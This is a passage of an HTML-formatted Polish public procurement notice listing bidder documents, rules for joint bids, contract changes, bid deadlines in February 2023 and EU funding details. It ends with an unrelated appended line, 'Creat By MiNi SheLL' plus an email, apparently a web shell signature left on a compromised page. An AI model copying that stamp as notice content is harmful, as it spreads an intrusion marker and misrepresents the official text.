ustawy Pzp (wzór oświadczenia stanowi Załącznik Nr 12 do SWZ) - oświadczenie to składa odpowiednio: Wykonawca, każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz podmiot udostępniający zasoby na zasadach określonych w art. 118 ustawy Pzp;<br/><br/>b)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r., poz. 275), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi Załącznik Nr 6 do SWZ); <br/>c)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej:<br/>a)	wykazu dostaw wykonanych nie wcześniej niż w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których dostawy te zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (wzór Wykazu dostaw stanowi Załącznik Nr 7 do SWZ;);</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Do oferty wspólnej winno być dołączone pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>3.	Wszelka korespondencja w postępowaniu będzie prowadzona z podmiotem występującym jako pełnomocnik. <br/>4.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>5.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki udziału w postępowaniu, określone w ust. 1 pkt 2 lit. d Działu X SWZ, musi spełniać co najmniej jeden Wykonawca. Warunek, o którym mowa w ust. 1 pkt 2 lit. d) Działu X SWZ, nie podlega sumowaniu, tj. Zamawiający nie dopuszcza sumowania potencjału (łączenia doświadczenia). <br/>6.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wskazanych w ust. 1 pkt 2 lit. d Działu X SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają dostawy, do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, w którym należy wskazać, które dostawy wykonają poszczególni Wykonawcy (wzór oświadczenia stanowi Załącznik Nr 8 do SWZ). <br/>7.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie odrębnie składa oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (Załącznik Nr 2 do SWZ). Oświadczenia te należy złożyć wraz z ofertą. <br/>8.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>9.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <br/>10.	W przypadku wyboru oferty Wykonawców wnoszących ją wspólnie, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia kopii umowy regulującej współpracę tych Wykonawców.<br/>11.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o zamówienie kluczowych zadań dot. przedmiotowego zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy chyba, że zachodzi co najmniej jedna z okoliczności zawartych w § 11 Projektu umowy (Załącznik Nr 4 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-01 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamówienie realizowane jest ze środków Unii Europejskiej w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020, współfinansowanego ze środków Europejskiego Funduszu Społecznego, Oś priorytetowa II - Efektywne polityki publiczne dla rynku pracy, gospodarki i edukacji, Działanie 2.18 - Wysokiej jakości usługi administracyjne, w związku z realizacją przez Powiat Karkonoski przedsięwzięcia grantowego pn. „Zwiększenie dostępności usług publicznych w Powiecie Karkonoskim” w ramach projektu grantowego dla jednostek samorządu terytorialnego pn. „Dostępny samorząd - granty” realizowanego przez Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych.

Creat By MiNi SheLL
Email: jattceo@gmail.com